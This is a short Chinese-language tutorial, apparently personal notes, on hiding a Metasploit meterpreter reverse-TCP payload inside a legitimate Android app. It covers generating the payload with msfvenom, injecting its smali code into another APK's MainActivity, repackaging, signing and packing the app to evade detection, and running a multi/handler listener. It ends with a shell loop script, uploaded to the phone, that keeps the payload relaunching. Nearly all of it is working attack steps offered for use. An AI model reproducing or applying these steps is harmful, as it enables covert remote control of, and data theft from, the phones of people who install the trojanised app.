参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译 //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名 //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳 //百度"加壳工具"
10,service postgresql start //启动数据库
11,msfconsole //启动msf
12,use exploit/multi/handler //加载攻击模块
13,set payload android/meterpreter/reverse_tcp //选择要使用的Payload
14,show options //查看需要设置的参数
15,exploit //执行
16,持续监听编写一个sh脚本,保存桌面并赋权限
#! /bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN(action标签) -n com.metasploit.stage/.MainActivity
sleep 20
done
meterpreter > pwd //找到当前路径
meterpreter > upload /root/桌面/chixu.sh //上传脚本
meterpreter > shell //输入shell
pwd
/
cd /data/user/0/com.baidu.flashlight/files //找到脚本所在文件夹
ls
chixu.sh
sh chixu.sh //运行脚本
msf支持上线自动执行命令,设置InitialAutoRunScript或autorunscript可以让你上线的session自动上传并执行脚本